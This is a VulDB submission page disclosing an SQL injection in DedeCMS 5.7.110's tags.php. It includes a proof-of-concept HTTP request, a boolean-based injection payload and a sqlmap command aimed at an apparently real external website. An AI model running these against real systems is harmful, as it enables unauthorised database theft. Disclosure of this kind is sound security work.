| Titolo | dedecms sql injection |
|---|
| Descrizione | Website: www.dedecms.com/
Affected version: DedeCMS V5.7.110
Vulnerability description: dedecms's tag query interface has SQL injection, using the variable $tag_alias to interpolate strings in SQL query statements,
and does not perform any filtering or escape processing on $tag_alias. This allows malicious users to inject malicious SQL code by constructing specific URL parameters.
Attackers can use this to steal sensitive information such as databases.
POC :
GET /uploads/tags.php?QUERY_STRING=alias/alias/bbb* HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1689668702,1689755217,1689908948,1690348034; Hm_lvt_f8cddee34ca21f05373a9388cfdd798b=1691473417
Connection: close
SQLmap:
sqlmap.py -u "http://list.beijingcloud.com.cn/tags.php?QUERY_STRING=alias/alias/bbb*" -dbs --batch
Payload: http://127.0.0.1:80/uploads/tags.php?QUERY_STRING=alias/alias/bbb' AND 8367=8367 AND 'yMwU'='yMwU |
|---|
| Fonte | ⚠️ https://github.com/laoquanshi/cve |
|---|
| Utente | heishou (UID 53637) |
|---|
| Sottomissione | 30/08/2023 04:49 (3 anni fa) |
|---|
| Moderazione | 03/09/2023 09:01 (4 days later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 238636 [DedeCMS 5.7.110 /uploads/tags.php tag_alias iniezione SQL] |
|---|
| Punti | 18 |
|---|